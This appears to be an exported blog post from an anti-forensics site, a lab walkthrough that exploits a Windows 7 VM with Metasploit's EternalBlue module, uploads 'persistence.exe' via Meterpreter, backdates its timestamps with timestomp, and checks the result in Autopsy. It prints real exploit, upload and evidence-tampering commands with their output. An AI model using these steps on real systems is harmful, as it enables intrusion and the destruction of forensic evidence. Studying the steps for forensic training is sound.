{"id":366,"date":"2024-03-09T19:05:18","date_gmt":"2024-03-09T19:05:18","guid":{"rendered":"https:\/\/anti-forensics.com\/blog\/?p=366"},"modified":"2024-03-09T19:44:37","modified_gmt":"2024-03-09T19:44:37","slug":"metasploit-meterpreter-timestomp-and-verification-with-autopsy","status":"publish","type":"post","link":"https:\/\/anti-forensics.com\/blog\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\/","title":{"rendered":"Metasploit Meterpreter timestomp and Verification with Autopsy"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">The Setup<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><br><strong>Timestomping <\/strong>is a technique used to <em>manipulate the timestamps<\/em> associated with files on a computer system, such as the creation, modification, and access times, in order to conceal or alter the chronological history of a file&#8217;s activity. By modifying these timestamps, attackers can obfuscate the true timeline of events, making it difficult for forensic investigators to accurately determine when a file was created, modified, or accessed.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Timestomping can be achieved using various methods, including directly modifying file attributes, leveraging file system vulnerabilities, or employing specialized tools and scripts. This technique is often used in cyber attacks and digital forensics to evade detection, hinder attribution, or manipulate evidence.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">First, a Windows 7 x64 virtual machine is created. Use EternalBlue to gain access to this virtual machine. Upload persistence.exe and then modify its timestamps. Shutdown the virtual machine and view the vmdk (virtual disk) with Autopsy, browse to persistence.exe and view the timestamps.<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Exploit a Windows 7 x64 virtual machine with EternalBlue<\/li>\n\n\n\n<li>Upload persistence.exe<\/li>\n\n\n\n<li>Modify the timestamps of persistence.exe using Meterpreter timestomp<\/li>\n\n\n\n<li>Verify by mounting the virtual disk (vmdk) in Autopsy and checking the timestamps<\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">The Software<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Autopsy<\/strong> (<a href=\"https:\/\/www.autopsy.com\/download\/\" target=\"_blank\" rel=\"noreferrer noopener\">download<\/a>)<strong> <\/strong>&#8211; is a comprehensive open-source digital forensic platform used by forensic analysts, investigators, and law enforcement agencies worldwide to examine and analyze digital evidence from various sources, including hard drives, mobile devices, and network traffic. It provides a user-friendly interface and a wide range of powerful tools for forensic analysis, including file system analysis, keyword searching, timeline analysis, and data carving. Autopsy supports the analysis of both live and disk images, allowing investigators to uncover valuable information such as deleted files, internet history, and email communications. Its modular architecture enables the integration of additional plugins and extensions, further extending its capabilities for specialized forensic tasks. With its intuitive interface and robust feature set, Autopsy simplifies and streamlines the digital forensic investigation process, helping investigators uncover evidence crucial to solving crimes and aiding in legal proceedings.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Metasploit <\/strong>(<a href=\"https:\/\/www.metasploit.com\/download\" target=\"_blank\" rel=\"noreferrer noopener\">download<\/a>) &#8211; Metasploit is a widely used open-source penetration testing framework that provides security professionals, ethical hackers, and researchers with a powerful suite of tools for discovering, exploiting, and securing vulnerabilities in computer systems. Developed and maintained by Rapid7, Metasploit offers a vast array of modules and exploits that can be used to simulate real-world cyber attacks, assess the security posture of target systems, and develop effective defense strategies. Its modular architecture allows users to customize and extend its functionality to suit their specific needs, whether it&#8217;s conducting network reconnaissance, launching remote exploits, or post-exploitation activities. With its user-friendly interface and extensive documentation, Metasploit empowers security practitioners to proactively identify and address security weaknesses before they can be exploited by malicious actors, thereby enhancing overall cybersecurity resilience.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">The Exploit<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">EternalBlue is a highly potent exploit developed by the U.S. National Security Agency (NSA) and leaked by the Shadow Brokers hacking group in 2017. Exploiting a vulnerability in Microsoft&#8217;s Server Message Block (SMB) protocol (CVE-2017-0144), EternalBlue allows attackers to remotely execute arbitrary code on vulnerable Windows systems without user authentication. This exploit was famously utilized as a key component in the global WannaCry ransomware attack, which caused widespread disruption and financial damage to organizations worldwide. EternalBlue&#8217;s effectiveness lies in its ability to rapidly propagate through networks, making it a significant threat to systems lacking proper security patches and network segmentation.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>msf6 exploit(windows\/smb\/ms17_010_eternalblue) > run\r\n\r\n&#91;*] Started reverse TCP handler on 192.168.254.131:4444 \r\n&#91;*] 192.168.254.136:445 - Using auxiliary\/scanner\/smb\/smb_ms17_010 as check\r\n&#91;+] 192.168.254.136:445   - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)\r\n...<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Next &#8220;persistence.exe&#8221; is uploaded using <em>meterpreter<\/em>.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>meterpreter > upload persistence.exe\n&#91;*] Uploading  : \/home\/user\/Desktop\/testing\/persistence.exe -> persistence.exe\n&#91;*] Uploaded 761.00 B of 761.00 B (100.0%): \/home\/user\/Desktop\/testing\/persistence.exe -> persistence.exe\n&#91;*] Completed  : \/home\/user\/Desktop\/testing\/persistence.exe -> persistence.exe<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Next, <code>timestomp<\/code> is run with the <code>-z<\/code> option which sets all four values on an NTFS system, against the persistence.exe file. The other options are:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Usage: timestomp &lt;file(s)> OPTIONS\r\n\r\nOPTIONS:\r\n\r\n    -a   Set the \"last accessed\" time of the file\r\n    -b   Set the MACE timestamps so that EnCase shows blanks\r\n    -c   Set the \"creation\" time of the file\r\n    -e   Set the \"mft entry modified\" time of the file\r\n    -f   Set the MACE of attributes equal to the supplied file\r\n    -h   Help banner\r\n    -m   Set the \"last written\" time of the file\r\n    -r   Set the MACE timestamps recursively on a directory\r\n    -v   Display the UTC MACE values of the file\r\n<strong>    -z   Set all four attributes (MACE) of the file<\/strong><\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>meterpreter > timestomp persistence.exe -z \"07\/13\/2009 20:01:01\"\r\n&#91;*] Setting specific MACE attributes on persistence.exe\r<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">The Verification<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>meterpreter > timestomp -v persistence.exe\n&#91;*] Showing MACE attributes for persistence.exe\nModified      : 2009-07-13 21:01:01 -0600\nAccessed      : 2009-07-13 21:01:01 -0600\nCreated       : 2009-07-13 21:01:01 -0600\nEntry Modified: 2009-07-13 21:01:01 -0600<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The .vmdk or virtual disk is loaded into Autopsy as an evidence source and the filesystem is viewed. Notice that persistence.exe now has a 7\/13\/2009 date(s) and blends in with the other default installation files by timestamp when in timeline review.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"979\" height=\"90\" src=\"https:\/\/anti-forensics.com\/blog\/wp-content\/uploads\/2024\/03\/image-3.png\" alt=\"\" class=\"wp-image-368\" srcset=\"https:\/\/anti-forensics.com\/blog\/wp-content\/uploads\/2024\/03\/image-3.png 979w, https:\/\/anti-forensics.com\/blog\/wp-content\/uploads\/2024\/03\/image-3-300x28.png 300w, https:\/\/anti-forensics.com\/blog\/wp-content\/uploads\/2024\/03\/image-3-768x71.png 768w, https:\/\/anti-forensics.com\/blog\/wp-content\/uploads\/2024\/03\/image-3-150x14.png 150w, https:\/\/anti-forensics.com\/blog\/wp-content\/uploads\/2024\/03\/image-3-696x64.png 696w\" sizes=\"auto, (max-width: 979px) 100vw, 979px\" \/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>Timestomping is a technique used to manipulate the timestamps associated with files on a computer system, such as the creation, modification, and access times, in order to conceal or alter the chronological history of a file&#8217;s activity.<\/p>\n","protected":false},"author":1,"featured_media":378,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[20],"tags":[59,57,58,19],"class_list":["post-366","post","type-post","status-publish","format-standard","has-post-thumbnail","category-anti-forensics","tag-autopsy","tag-metasploit","tag-meterpreter","tag-timestomp"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Metasploit Meterpreter timestomp and Verification with Autopsy - Anti-Forensics.com<\/title>\n<meta name=\"description\" content=\"Timestomping is a technique used to manipulate the timestamps associated with files on a computer system, such as the creation, modification, and access times, in order to conceal or alter the chronological history of a file&#039;s activity.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/anti-forensics.com\/blog\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Metasploit Meterpreter timestomp and Verification with Autopsy - Anti-Forensics.com\" \/>\n<meta property=\"og:description\" content=\"Timestomping is a technique used to manipulate the timestamps associated with files on a computer system, such as the creation, modification, and access times, in order to conceal or alter the chronological history of a file&#039;s activity.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/anti-forensics.com\/blog\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\/\" \/>\n<meta property=\"og:site_name\" content=\"Anti-Forensics.com\" \/>\n<meta property=\"article:author\" content=\"https:\/\/facebook.com\/stercutis\" \/>\n<meta property=\"article:published_time\" content=\"2024-03-09T19:05:18+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-03-09T19:44:37+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/anti-forensics.com\/blog\/wp-content\/uploads\/2024\/03\/anti-forensics.com-meterpreter-timestomp-autopsy.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"1024\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Max\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Max\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\\\/\"},\"author\":{\"name\":\"Max\",\"@id\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/#\\\/schema\\\/person\\\/ac3dd160cb42b1409a2a55dea58beec2\"},\"headline\":\"Metasploit Meterpreter timestomp and Verification with Autopsy\",\"datePublished\":\"2024-03-09T19:05:18+00:00\",\"dateModified\":\"2024-03-09T19:44:37+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\\\/\"},\"wordCount\":643,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/03\\\/anti-forensics.com-meterpreter-timestomp-autopsy.jpg\",\"keywords\":[\"autopsy\",\"metasploit\",\"meterpreter\",\"timestomp\"],\"articleSection\":[\"Anti-Forensics\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\\\/\",\"url\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\\\/\",\"name\":\"Metasploit Meterpreter timestomp and Verification with Autopsy - Anti-Forensics.com\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/03\\\/anti-forensics.com-meterpreter-timestomp-autopsy.jpg\",\"datePublished\":\"2024-03-09T19:05:18+00:00\",\"dateModified\":\"2024-03-09T19:44:37+00:00\",\"description\":\"Timestomping is a technique used to manipulate the timestamps associated with files on a computer system, such as the creation, modification, and access times, in order to conceal or alter the chronological history of a file's activity.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\\\/#primaryimage\",\"url\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/03\\\/anti-forensics.com-meterpreter-timestomp-autopsy.jpg\",\"contentUrl\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/03\\\/anti-forensics.com-meterpreter-timestomp-autopsy.jpg\",\"width\":1024,\"height\":1024},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Metasploit Meterpreter timestomp and Verification with Autopsy\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/\",\"name\":\"Anti-Forensics.com\",\"description\":\"Rendering Digital Investigations Irrelevant\",\"publisher\":{\"@id\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/#organization\",\"name\":\"Anti-Forensics.com\",\"url\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/cropped-anti-forensics.com_.jpg\",\"contentUrl\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/wp-content\\\/uploads\\\/2024\\\/01\\\/cropped-anti-forensics.com_.jpg\",\"width\":512,\"height\":512,\"caption\":\"Anti-Forensics.com\"},\"image\":{\"@id\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.linkedin.com\\\/groups\\\/14345620\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/#\\\/schema\\\/person\\\/ac3dd160cb42b1409a2a55dea58beec2\",\"name\":\"Max\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/7ca31cae39a49ab947496651bc5c75ee545a72f31c02db1a5c31f80b28714601?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/7ca31cae39a49ab947496651bc5c75ee545a72f31c02db1a5c31f80b28714601?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/7ca31cae39a49ab947496651bc5c75ee545a72f31c02db1a5c31f80b28714601?s=96&d=mm&r=g\",\"caption\":\"Max\"},\"description\":\"Anti-forensics involves attempts to hide data, damage the confidentiality, integrity, and availability of data in an effort to make analysis and examination of this data (evidence) difficult or impossible.\",\"sameAs\":[\"https:\\\/\\\/anti-forensics.com\\\/blog\",\"https:\\\/\\\/facebook.com\\\/stercutis\",\"https:\\\/\\\/linkedin.com\\\/in\\\/jesse-shelley\"],\"url\":\"https:\\\/\\\/anti-forensics.com\\\/blog\\\/author\\\/realjesseshelley_hkwwlra2\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Metasploit Meterpreter timestomp and Verification with Autopsy - Anti-Forensics.com","description":"Timestomping is a technique used to manipulate the timestamps associated with files on a computer system, such as the creation, modification, and access times, in order to conceal or alter the chronological history of a file's activity.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/anti-forensics.com\/blog\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\/","og_locale":"en_US","og_type":"article","og_title":"Metasploit Meterpreter timestomp and Verification with Autopsy - Anti-Forensics.com","og_description":"Timestomping is a technique used to manipulate the timestamps associated with files on a computer system, such as the creation, modification, and access times, in order to conceal or alter the chronological history of a file's activity.","og_url":"https:\/\/anti-forensics.com\/blog\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\/","og_site_name":"Anti-Forensics.com","article_author":"https:\/\/facebook.com\/stercutis","article_published_time":"2024-03-09T19:05:18+00:00","article_modified_time":"2024-03-09T19:44:37+00:00","og_image":[{"width":1024,"height":1024,"url":"https:\/\/anti-forensics.com\/blog\/wp-content\/uploads\/2024\/03\/anti-forensics.com-meterpreter-timestomp-autopsy.jpg","type":"image\/jpeg"}],"author":"Max","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Max","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/anti-forensics.com\/blog\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\/#article","isPartOf":{"@id":"https:\/\/anti-forensics.com\/blog\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\/"},"author":{"name":"Max","@id":"https:\/\/anti-forensics.com\/blog\/#\/schema\/person\/ac3dd160cb42b1409a2a55dea58beec2"},"headline":"Metasploit Meterpreter timestomp and Verification with Autopsy","datePublished":"2024-03-09T19:05:18+00:00","dateModified":"2024-03-09T19:44:37+00:00","mainEntityOfPage":{"@id":"https:\/\/anti-forensics.com\/blog\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\/"},"wordCount":643,"commentCount":0,"publisher":{"@id":"https:\/\/anti-forensics.com\/blog\/#organization"},"image":{"@id":"https:\/\/anti-forensics.com\/blog\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\/#primaryimage"},"thumbnailUrl":"https:\/\/anti-forensics.com\/blog\/wp-content\/uploads\/2024\/03\/anti-forensics.com-meterpreter-timestomp-autopsy.jpg","keywords":["autopsy","metasploit","meterpreter","timestomp"],"articleSection":["Anti-Forensics"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/anti-forensics.com\/blog\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/anti-forensics.com\/blog\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\/","url":"https:\/\/anti-forensics.com\/blog\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\/","name":"Metasploit Meterpreter timestomp and Verification with Autopsy - Anti-Forensics.com","isPartOf":{"@id":"https:\/\/anti-forensics.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/anti-forensics.com\/blog\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\/#primaryimage"},"image":{"@id":"https:\/\/anti-forensics.com\/blog\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\/#primaryimage"},"thumbnailUrl":"https:\/\/anti-forensics.com\/blog\/wp-content\/uploads\/2024\/03\/anti-forensics.com-meterpreter-timestomp-autopsy.jpg","datePublished":"2024-03-09T19:05:18+00:00","dateModified":"2024-03-09T19:44:37+00:00","description":"Timestomping is a technique used to manipulate the timestamps associated with files on a computer system, such as the creation, modification, and access times, in order to conceal or alter the chronological history of a file's activity.","breadcrumb":{"@id":"https:\/\/anti-forensics.com\/blog\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/anti-forensics.com\/blog\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/anti-forensics.com\/blog\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\/#primaryimage","url":"https:\/\/anti-forensics.com\/blog\/wp-content\/uploads\/2024\/03\/anti-forensics.com-meterpreter-timestomp-autopsy.jpg","contentUrl":"https:\/\/anti-forensics.com\/blog\/wp-content\/uploads\/2024\/03\/anti-forensics.com-meterpreter-timestomp-autopsy.jpg","width":1024,"height":1024},{"@type":"BreadcrumbList","@id":"https:\/\/anti-forensics.com\/blog\/metasploit-meterpreter-timestomp-and-verification-with-autopsy\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/anti-forensics.com\/blog\/"},{"@type":"ListItem","position":2,"name":"Metasploit Meterpreter timestomp and Verification with Autopsy"}]},{"@type":"WebSite","@id":"https:\/\/anti-forensics.com\/blog\/#website","url":"https:\/\/anti-forensics.com\/blog\/","name":"Anti-Forensics.com","description":"Rendering Digital Investigations Irrelevant","publisher":{"@id":"https:\/\/anti-forensics.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/anti-forensics.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/anti-forensics.com\/blog\/#organization","name":"Anti-Forensics.com","url":"https:\/\/anti-forensics.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/anti-forensics.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/anti-forensics.com\/blog\/wp-content\/uploads\/2024\/01\/cropped-anti-forensics.com_.jpg","contentUrl":"https:\/\/anti-forensics.com\/blog\/wp-content\/uploads\/2024\/01\/cropped-anti-forensics.com_.jpg","width":512,"height":512,"caption":"Anti-Forensics.com"},"image":{"@id":"https:\/\/anti-forensics.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.linkedin.com\/groups\/14345620\/"]},{"@type":"Person","@id":"https:\/\/anti-forensics.com\/blog\/#\/schema\/person\/ac3dd160cb42b1409a2a55dea58beec2","name":"Max","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/7ca31cae39a49ab947496651bc5c75ee545a72f31c02db1a5c31f80b28714601?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/7ca31cae39a49ab947496651bc5c75ee545a72f31c02db1a5c31f80b28714601?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/7ca31cae39a49ab947496651bc5c75ee545a72f31c02db1a5c31f80b28714601?s=96&d=mm&r=g","caption":"Max"},"description":"Anti-forensics involves attempts to hide data, damage the confidentiality, integrity, and availability of data in an effort to make analysis and examination of this data (evidence) difficult or impossible.","sameAs":["https:\/\/anti-forensics.com\/blog","https:\/\/facebook.com\/stercutis","https:\/\/linkedin.com\/in\/jesse-shelley"],"url":"https:\/\/anti-forensics.com\/blog\/author\/realjesseshelley_hkwwlra2\/"}]}},"_links":{"self":[{"href":"https:\/\/anti-forensics.com\/blog\/wp-json\/wp\/v2\/posts\/366","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/anti-forensics.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/anti-forensics.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/anti-forensics.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/anti-forensics.com\/blog\/wp-json\/wp\/v2\/comments?post=366"}],"version-history":[{"count":7,"href":"https:\/\/anti-forensics.com\/blog\/wp-json\/wp\/v2\/posts\/366\/revisions"}],"predecessor-version":[{"id":381,"href":"https:\/\/anti-forensics.com\/blog\/wp-json\/wp\/v2\/posts\/366\/revisions\/381"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/anti-forensics.com\/blog\/wp-json\/wp\/v2\/media\/378"}],"wp:attachment":[{"href":"https:\/\/anti-forensics.com\/blog\/wp-json\/wp\/v2\/media?parent=366"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/anti-forensics.com\/blog\/wp-json\/wp\/v2\/categories?post=366"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/anti-forensics.com\/blog\/wp-json\/wp\/v2\/tags?post=366"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}